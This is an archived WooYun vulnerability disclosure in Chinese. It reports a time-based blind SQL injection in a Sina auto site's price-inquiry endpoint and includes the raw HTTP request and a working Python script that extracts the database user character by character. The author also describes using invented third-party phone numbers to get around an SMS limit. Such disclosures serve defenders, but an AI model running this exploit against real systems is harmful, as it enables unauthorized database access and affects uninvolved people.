新浪某站点SQL时间盲注漏洞（附验证脚本）

2017年3月31日16:48:55评论355 views字数 204阅读0分40秒阅读模式

摘要

2016-03-24：细节已通知厂商并且等待厂商处理中
2016-03-25：厂商已经确认，细节仅向厂商公开
2016-04-04：细节向核心白帽子及相关领域专家公开
2016-04-14：细节向普通白帽子公开
2016-04-24：细节向实习白帽子公开
2016-05-09：细节向公众公开

漏洞概要关注数(14) 关注此漏洞

缺陷编号： WooYun-2016-188597

漏洞标题：新浪某站点SQL时间盲注漏洞（附验证脚本）

漏洞作者： Blcat

提交时间： 2016-03-24 15:40

公开时间： 2016-05-09 18:25

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

昨天刷微博不小心挖的漏洞
38万数据不给我20rank
生气！！！
再给我10rank我明天还挖一个你信不信

详细说明：

code 区域

POST /new/index.php/api/xunjia/AjaxAskPrice HTTP/1.1
 Host: weidealer.auto.sina.com.cn
 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 192
 
 info%5Bmobile%5D=13888888889&info%5Bprovince_id%5D=11&info%5Bcity_id%5D=1&info%5Bbrand_id%5D=95&info%5Bsub_brand_id%5D=1661&info%5Bcar_id%5D=18058&info%5Bxname%5D=false&info%5Bask_reffer%5D=67

注入点car[id]

时间盲注

然后用自己的手机号跑啊跑啊发现单个手机号码最多发20次短信

手机号那里有个验证

但是user的长度大于20，需要更换手机号，所以对不起我随便编出来的手机号的各位了

附验证脚本：

code 区域

#!/usr/bin/env python
 # coding: UTF-8 （๑•̀ㅂ•́)و✧
 __author__ = 'T1m0n'
 
 import httplib, time
 
 headers = {
     'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
     'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
     'User-Agent': 'Mozilla/5.0(WindowsNT6.3;Win64;x64;rv:44.0) Gecko / 20100101Firefox / 44.0',
     'Host': 'weidealer.auto.sina.com.cn',
     'Content-Type': 'application/x-www-form-urlencoded',
 }
 
 user = ''
 payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_'
 i = 100
 for x in range(1, 24):
     for payload in payloads:
         conn = httplib.HTTPConnection('weidealer.auto.sina.com.cn', 80)
         url = '/new/index.php/api/xunjia/AjaxAskPrice'
         start_time = time.time()
         number = '138345%05d' % i
         body = 'info[mobile]=' + number + '&info[province_id]=11&info[city_id]=1&info[brand_id]=95&info[sub_brand_id]=1661&info[car_id]=18058 AND (SELECT * FROM (SELECT'
         body += '(if(ascii(substr(user(),%d,1))=%d,sleep(5),1)' % (x, ord(payload))
         body += '))zkHd)-- mGEC&info[xname]=false&info[ask_reffer]=67'
         conn.request('POST', url, body, headers)
         res = conn.getresponse().read()
         conn.close()
         print '.',
         i += 1
         if time.time() - start_time > 5:
             print payload
             user += payload
             break
 
 print user

漏洞证明：

跑完是这样子的

code 区域

user:

修复方案：

过滤

版权声明：转载请注明来源 Blcat@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2016-03-25 18:25

厂商回复：

感谢关注新浪安全，问题修复中。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-24 18:33 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

1

年轻人，要超神，我的加快研发节奏了

1# 回复此人
2016-03-24 22:45 | 小不点 ( 核心白帽子 | Rank:1400 漏洞数:145 | 刷起，我想换个MacBook...)

1

为什么ssrc没人审核了？

2# 回复此人

漏洞概要 关注数(14) 关注此漏洞

缺陷编号： WooYun-2016-188597

漏洞标题： 新浪某站点SQL时间盲注漏洞（附验证脚本）

相关厂商： 新浪

漏洞作者： Blcat

提交时间： 2016-03-24 15:40

公开时间： 2016-05-09 18:25

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Blcat@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(14) 关注此漏洞

漏洞标题：新浪某站点SQL时间盲注漏洞（附验证脚本）

相关厂商：新浪

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分